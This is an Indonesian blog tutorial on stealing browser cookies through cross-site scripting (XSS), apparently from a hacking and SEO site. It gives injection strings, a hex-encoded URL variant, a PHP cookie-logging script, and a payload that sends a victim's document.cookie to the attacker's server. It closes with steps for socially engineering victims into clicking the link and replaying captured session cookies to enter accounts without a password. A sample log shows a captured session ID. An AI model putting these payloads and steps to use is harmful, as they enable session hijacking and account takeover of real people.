• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Mencuri cookie dengan methode XSS referansi"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeExploitationsMencuri cookie dengan methode XSS referansi
    Mencuri cookie dengan methode XSS referansi

    Mencuri cookie dengan methode XSS referansi

    Simpan Postingan

    Disini saya menjelaskan tentang code dari inject menggunakan XSS , karena mungkin teman-teman sudah tahu apa yang di maksud dengan XSS
    Langsung ke code ya ^_^ . ya mungkin atau katakan lah sebuah website tersebut memiliki pencarian sebagai berikut :

    <tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr> 



    Untuk melakukan Injeksi coba lihat perhatikan dahulu tanda kutip pada code di atas . Apa yang harus di lakukan pada kode di atas ?
    Kita mesti menutup / mengakhiri value tersebut sebelum kita melaksanakan injeksi ^_^ .


    "><script>alert("test")</script> 



    Nah Lanjut ya , kode di atas adalah untuk dapat menginject web yang akan di eksekusi,tapi ingat harus menutup nya dengan tanda kutip ^_^ .
    Nah sekarang perlu di ketahui bahwa inject tersebut bukan ke dalam web server tersebut atau dalam istilah nya bukan web yang telah terpasang sebuah shell.
    karena XSS adalah halaman di browser yang kita inject setelah kita menambahkan code inject tersebut,
    sebuah contoh kita menginject dengan XSS kita tidak masuk dalam web server tersebut dan kita bisa mendeface nya.
    Lanjut kita ke Contoh :



    http://www.site.com/search.php?q="><script>alert("test")</script>


    Nah Script di atas bisa juga kita manipulasi melalui hex query, berarti kita ke ascii hex ^_^
    Link nya bisa di sini : http://www.easycalculation.com/ascii-hex.php
    Setelah di kode ascii script code terdebut menjadi seperti di bawah ini ^_^


    http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e

    Penjelasan di atas adalah injeksi menggunakan XSS yang biasa atau sering di pake oleh attacker ,

    Nah sebelum kita lanjut tentang Mencuri Cookie Dengan Methode XSS ada kalanya kita Minum air dahulu sambil Makan Roti ^_^

    Mencuri Cookie Dengan Methode XSS

    Nah Setelah kelar ngopi lanjut lagi , setelah penjelasan di atas kita tahu apa itu / menginject dengan methode XSS,
    kalau belum paham ya berarti sama kaya saya ^_^.Yuk lanjut sekarang jika kita ingin mencuri cokie dari web tersebut bagaimana caranya ?
    Cara yang termudah kita lakukan adalah 3 langkah yaitu : wudhu , shalat dan zikir eh salah ding bukan itu ,
    1. server web kita / shell yang udah tertanam
    2. Script Cokie ( ini adalah untuk melakukan inject )
    3. log file

    Langkah yang di lakukan adalah teman-teman harus membuat dua file yaitu log.txt dan scriptcokie.php .
    File log.txt biarkan kosong tidak masalah ^_^ , nah klo file yang scriptcokie.php harus di isi dengan script / code di bawah ini :


    <?php

    function GetIP()
    {
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
    $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
    $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
    $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
    $ip = $_SERVER['REMOTE_ADDR'];
    else
    $ip = "unknown";
    return($ip);
    }

    function logData()
    {
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
    fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
    else
    fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
    }

    logData();

    ?>




    pasti teman-teman bertanya buat apa script di atas ?
    script tersebut adalah untuk mencatat setiap pengunjung yang mengunjungi web tersebut / web yang akan di inject .
    Setelah kita persiapkan dua file tersebut kita upload wi web server kita / shell hasil inject ^_^ ,

    Nah sekarang kita mencari web yang rentan terhadap serangan XSS untuk dapat bisa mengakses script tersebut untuk memodifikasi kan nya bisa lihat contoh di bawah ini :

    "><script language= "JavaScript">document.location="http://yoursite.com/scriptcokie.php?cookie=" + document.cookie;document.location="http://www.webinject.com"</script> 



    Perhatikan Script di atas bahwa injeksi ini hanya akan bekerja jika teman-teman tidak memodifikasi sumber halaman di ujung web server,
    Nah meskipun ini merupakan solusi / halangan , kita bisa menyelesaikan maslah tersebut dengan cara menggunakan script inject tersebut.


    logData(); logData ();
    ?> ?>




    Seperti ini contoh nya :


    logData(); logData ();

    echo '<b>Page Under Construction</b>' echo '<b> Page Under Construction </ b>'
    ?> ?> 



    Sekarang coba kita lihat file log.txt yang tadi nya kosong akan muncul seperti di bawah ini :


    IP: 114.141.51.12 | PORT: 3128 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php |

    DATE: Friday 24st 2010f Desember 2010 09:06:02 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373


    Itu adalah sebaian contoh , masih ada sesuatu yang lain ^_^ selain PHPSESSID. tapi contoh nya mungkin sudah mantap alias joss.
    Nah sebelum berpisah ingat cara ngedit cokies nya yo buka firebug nya dan menambahkan / memodifikasi ( koyo motor wae yo ^_^ ) semua bidang cokie agar sesuai dengan file log tersebut ^_^.
    Web / server yang telah kita inject mungkin berfikir kita tidak bisa masuk / melihat isi di dalam nya.
    Nah dengan cara ini kita bisa login ke acount atau yang lain nya tanpa perlu mengetahui user dan password nya.

    Sedikit Tambahan ^_^ :
    1. Test web yang akan kita inject apakah rentan terhadapa serangan XSS
    2. Setelah mendapatkan web yang rentan kita upload dua file tersebut ke web kita / shell hasil inject.
    3. Masukan Injeksi melalui URL web tersebut atau kalau ada dalam kotak teks
    4. Ambil link atau URL dari halaman dengan permintaan pencarian dieksploitasi (jika injeksi tidak tersimpan di server salin halaman).
    5. Mencari atau sedikit soceng ke pada orang untuk mengklik link tersebut
    6. Periksa file log.txt nya
    7. Ubah cookie nya sendiri untuk cocok dengan hasil tangkapan dan refresh halaman.
    8. Periksa apakah anda maho atau bukan.

    Sekian dari saya semoga bisa di mengerti ^_^ , Jika kurang di mengerti maklum saya juga masih belajar dan tidak pintar merangkai kata-kata ^_^



    Wassalamu'alaikum


    Thaks : TI.Sn1pe7
    Exploitations
    September 23, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan